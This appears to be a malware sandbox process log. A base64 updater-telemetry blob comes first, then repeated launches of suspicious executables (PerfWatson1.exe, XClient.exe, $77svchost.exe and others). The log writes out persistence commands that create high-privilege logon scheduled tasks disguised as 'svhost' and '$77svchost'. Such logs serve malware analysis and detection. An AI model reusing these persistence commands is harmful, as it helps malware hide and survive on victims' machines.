pY2tzPSIxMjI4MTM3MjAyNSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvYTQ3MmVjZWMtYWU2OS00NDllLWI3YTItNGU4NmRmZWU1OGE5P1AxPTE3NDAwMjU1NDAmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9SmV0JTJiamdBdG5wbWlaaSUyYllhelZRVE1URnlKbGNFV2NtaXlGenc3R2lPVDFIQnpXOE5xMHhIJTJma2ltTWF1cDJSMzg4SGpSd3I1QjVqaldKVVdYYTVreVElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIxNTg3OTgyMSIgdG90YWw9IjU4NDk4MTI4IiBkb3dubG9hZF90aW1lX21zPSIyNzUxNCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAxMjg5NCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTIyODEzNzIwMjUiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9Indpbmh0dHAiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2E0NzJlY2VjLWFlNjktNDQ5ZS1iN2EyLTRlODZkZmVlNThhOT9QMT0xNzQwMDI1NTQwJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PUpldCUyYmpnQXRucG1pWmklMmJZYXpWUVRNVEZ5SmxjRVdjbWl5Rnp3N0dpT1QxSEJ6VzhOcTB4SCUyZmtpbU1hdXAyUjM4OEhqUndyNUI1ampXSlVXWGE1a3lRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iMTk5LjIzMi4yMTQuMTcyIiBjZG5fY2lkPSIzIiBjZG5fY2NjPSJHQiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iSElUIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjQzOTk0MTE2IiB0b3RhbD0iNTg0OTgxMjgiIGRvd25sb2FkX3RpbWVfbXM9IjIxNDI5OSIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTIyODEzNzIwMjUiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9hNDcyZWNlYy1hZTY5LTQ0OWUtYjdhMi00ZTg2ZGZlZTU4YTk_UDE9MTc0MDAyNTU0MCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1KZXQlMmJqZ0F0bnBtaVppJTJiWWF6VlFUTVRGeUpsY0VXY21peUZ6dzdHaU9UMUhCelc4TnEweEglMmZraW1NYXVwMlIzODhIalJ3cjVCNWpqV0pVV1hhNWt5USUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEyMjgxMzcyMDI1IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9hNDcyZWNlYy1hZTY5LTQ0OWUtYjdhMi00ZTg2ZGZlZTU4YTk_UDE9MTc0MDAyNTU0MCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1KZXQlMmJqZ0F0bnBtaVppJTJiWWF6VlFUTVRGeUpsY0VXY21peUZ6dzdHaU9UMUhCelc4TnEweEglMmZraW1NYXVwMlIzODhIalJ3cjVCNWpqV0pVV1hhNWt5USUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjU4NDk4MTI4IiB0b3RhbD0iNTg0OTgxMjgiIGRvd25sb2FkX3RpbWVfbXM9IjE3NTcwMyIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMjI4MTM3MjAyNSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMjI5MDI3ODA1NSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTI4MjQ2NTMyMDAiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSI5MjgiIGRvd25sb2FkX3RpbWVfbXM9IjQ1ODM2MSIgZG93bmxvYWRlZD0iNTg0OTgxMjgiIHRvdGFsPSI1ODQ5ODEyOCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNTM0MDYiLz48cGluZyByPSIyIiByZD0iNjYxNiIgcGluZ19mcmVzaG5lc3M9IntBMTU4RjBDNS01OURELTRBNTUtQjI3QS0yRUNBMzlERDZGODl9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"

C:\Users\Admin\AppData\Local\Temp\temp_16571.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inzBSFcKmn5c.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\temp_16571.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s4jzXqOvEGfn.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZIe5oHJX8Suu.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5mY021yCVQh1.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KFbtkHMeAXJX.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5vr1M2usLXRc.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe

"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"

C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe

"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"

C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe

"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nUS2gPIhGtNN.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\Desktop\Files\svchost.exe

"C:\Users\Admin\Desktop\Files\svchost.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EWxfLIywvcEI.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3D63.tmp.bat""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\c02a2c241a324dd19c2b6e4c88626ac7 /t 5616 /p 5944

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe

C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UkTqg95ZhAml.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Users\Admin\Desktop\Files\xxx.exe

"C:\Users\Admin\Desktop\Files\xxx.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8pVhhKXcKhQS.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YcMFuuFoZHsp.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xPlf2BI6iEkA.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8eC8nmLjGccv.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0MSPcy3lGfgs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GrTxXjz1jwCY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\Files\networkmanager.exe

"C:\Users\Admin\Desktop\Files\networkmanager.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V9DRgIUMHXOY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rVMlhZbJtSnx.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\q1wnx5ir.exe

"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7136 -ip 7136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 484

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\networkmanager.exe

"C:\Users\Admin\Desktop\Files\networkmanager.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gpjwRu1uMfKS.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UlHU2iZsPmmk.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\networkmanager.exe

"C:\Users\Admin\Desktop\Files\networkmanager.exe"

C:\Users\Admin\Desktop\Files\q1wnx5ir.exe

"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 248 -ip 248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 248 -s 456

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

